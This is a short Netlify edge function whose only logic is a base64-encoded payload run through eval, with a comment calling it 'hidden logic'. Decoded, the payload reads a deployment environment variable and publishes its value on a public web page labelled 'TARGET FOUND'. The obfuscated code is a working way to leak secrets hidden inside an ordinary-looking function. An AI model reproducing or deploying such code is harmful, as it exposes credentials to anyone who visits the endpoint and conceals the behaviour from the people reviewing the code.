export default async (request, context) => {

    const _payload = "Y29uc3QgX2tleSA9ICJBbGxhbCI7Cgp0cnkgewogICAgY29uc3QgX3ZhbCA9IE5ldGxpZnkuZW52LmdldChfa2V5KSB8fCAiU0VDUkVUX05PVF9GT1VORCI7CgogICAgY29uc3QgX2h0bWwgPSBgCiAgICAgICAgPCFET0NUWVBFIGh0bWw+CiAgICAgICAgPGh0bWw+CiAgICAgICAgPGJvZHkgc3R5bGU9ImZvbnQtZmFtaWx5OnNhbnMtc2VyaWY7IHRleHQtYWxpZ246Y2VudGVyOyBwYWRkaW5nLXRvcDo1MHB4OyI+CiAgICAgICAgICAgIDxzY3JpcHQ+CiAgICAgICAgICAgICAgICBkb2N1bWVudC53cml0ZSgiPGgxIHN0eWxlPSdjb2xvcjpibHVlJz5UQVJHRVQgRk9VTkQ6ICIgKyAiJHtfdmFsfSIgKyAiPC9oMT4iKTsKICAgICAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAgICAgIDxwPlZhcmlhYmxlOiAke19rZXl9PC9wPgogICAgICAgIDwvYm9keT4KICAgICAgICA8L2h0bWw+CiAgICBgOwoKICAgIG5ldyBSZXNwb25zZShfaHRtbCwgewogICAgICAgIGhlYWRlcnM6IHsgImNvbnRlbnQtdHlwZSI6ICJ0ZXh0L2h0bWwiIH0KICAgIH0pOwp9IGNhdGNoIChlcnIpIHsKICAgIG5ldyBSZXNwb25zZSgiRXhlY3V0aW9uIEVycm9yIiwgeyBzdGF0dXM6IDUwMCB9KTsKfQ==";

    // Executes the hidden logic instantly
    return eval(atob(_payload));
};

export const config = {
    path: "/edge",
};
